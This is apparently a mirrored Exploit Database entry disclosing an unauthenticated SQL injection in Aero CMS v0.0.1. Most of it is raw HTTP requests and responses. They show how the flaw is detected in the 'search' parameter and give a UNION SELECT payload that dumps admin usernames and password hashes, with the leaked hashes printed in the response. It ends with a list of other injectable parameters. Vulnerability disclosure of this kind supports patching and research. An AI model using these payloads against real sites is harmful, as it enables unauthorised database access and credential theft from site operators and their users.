Aero CMS v0.0.1 – SQL Injection (no auth)

• Exploit Database
• 131 阅读

• 作者： Hubert Wojciechowski
  日期： 2023-03-27
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/51083/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146

  # Exploit Title: Aero CMS v0.0.1 - SQL Injection (no auth) # Date: 15/10/2022 # Exploit Author: Hubert Wojciechowski # Contact Author: hub.woj12345@gmail.com # Vendor Homepage: https://github.com/MegaTKC/AeroCMS # Software Link: https://github.com/MegaTKC/AeroCMS # Version: 0.0.1 # Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23   ## Example SQL Injection   ----------------------------------------------------------------------------------------------------------------------- Param: search ----------------------------------------------------------------------------------------------------------------------- Req sql ini detect -----------------------------------------------------------------------------------------------------------------------   POST /AeroCMS-master/search.php HTTP/1.1 Host: 127.0.0.1 Cookie: PHPSESSID=g49qkbeug3g8gr0vlsufqa1g57 Origin: http://127.0.0.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Upgrade-Insecure-Requests: 1 Referer: http://127.0.0.1/AeroCMS-master/ Content-Type: application/x-www-form-urlencoded Accept-Language: en-US;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36 Connection: close Cache-Control: max-age=0 Content-Length: 21   search=245692&apos;&submit=   ----------------------------------------------------------------------------------------------------------------------- Res: -----------------------------------------------------------------------------------------------------------------------   HTTP/1.1 200 OK Date: Sat, 15 Oct 2022 03:07:06 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 3466 Connection: close Content-Type: text/html; charset=UTF-8 [...] Query failed You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near &apos;%&apos;&apos; at line 1   ----------------------------------------------------------------------------------------------------------------------- Req -----------------------------------------------------------------------------------------------------------------------   POST /AeroCMS-master/search.php HTTP/1.1 Host: 127.0.0.1 Cookie: PHPSESSID=g49qkbeug3g8gr0vlsufqa1g57 Origin: http://127.0.0.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Upgrade-Insecure-Requests: 1 Referer: http://127.0.0.1/AeroCMS-master/ Content-Type: application/x-www-form-urlencoded Accept-Language: en-US;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36 Connection: close Cache-Control: max-age=0 Content-Length: 21   search=245692&apos;&apos;&submit=   ----------------------------------------------------------------------------------------------------------------------- Res: -----------------------------------------------------------------------------------------------------------------------   HTTP/1.1 200 OK Date: Sat, 15 Oct 2022 03:07:10 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 94216 [...]   ----------------------------------------------------------------------------------------------------------------------- Req exploiting sql ini get data admin -----------------------------------------------------------------------------------------------------------------------   POST /AeroCMS-master/search.php HTTP/1.1 Host: 127.0.0.1 Cookie: PHPSESSID=g49qkbeug3g8gr0vlsufqa1g57 Origin: http://127.0.0.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Upgrade-Insecure-Requests: 1 Referer: http://127.0.0.1/AeroCMS-master/ Content-Type: application/x-www-form-urlencoded Accept-Language: en-US;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36 Connection: close Cache-Control: max-age=0 Content-Length: 113   search=245692&apos;+union+select+1,2,group_concat(username,char(58),password),4,5,6,7,8,9,10,11,12+from+users#&submit=   ----------------------------------------------------------------------------------------------------------------------- Res: -----------------------------------------------------------------------------------------------------------------------   HTTP/1.1 200 OK Date: Sat, 15 Oct 2022 05:40:05 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 101144 [...]   <a href="https://www.exploit-db.com/exploits/51083/#">admin:$2y$12$0BgqODF66TD.JZxL5MVRlOEIvap9XzkBEMVEeHyHe6RiOxdGrx3Ne,admin:$2y$12$0BgqODF66TD.JZxL5MVRlOEIvap9XzkBEMVEeHyHe6RiOxdGrx3Ne</a> [...]   ----------------------------------------------------------------------------------------------------------------------- Other URL and params ----------------------------------------------------------------------------------------------------------------------- /AeroCMS-master/admin/posts.php [post_title] /AeroCMS-master/admin/posts.php [filename] /AeroCMS-master/admin/profile.php [filename] /AeroCMS-master/author_posts.php [author] /AeroCMS-master/category.php [category] /AeroCMS-master/post.php [p_id] /AeroCMS-master/search.php [search] /AeroCMS-master/admin/categories.php [cat_title] /AeroCMS-master/admin/categories.php [phpwcmsBELang cookie] /AeroCMS-master/admin/posts.php [post_content] /AeroCMS-master/admin/posts.php [p_id] /AeroCMS-master/admin/posts.php [post_category_id] /AeroCMS-master/admin/posts.php [post_title] /AeroCMS-master/admin/posts.php [reset]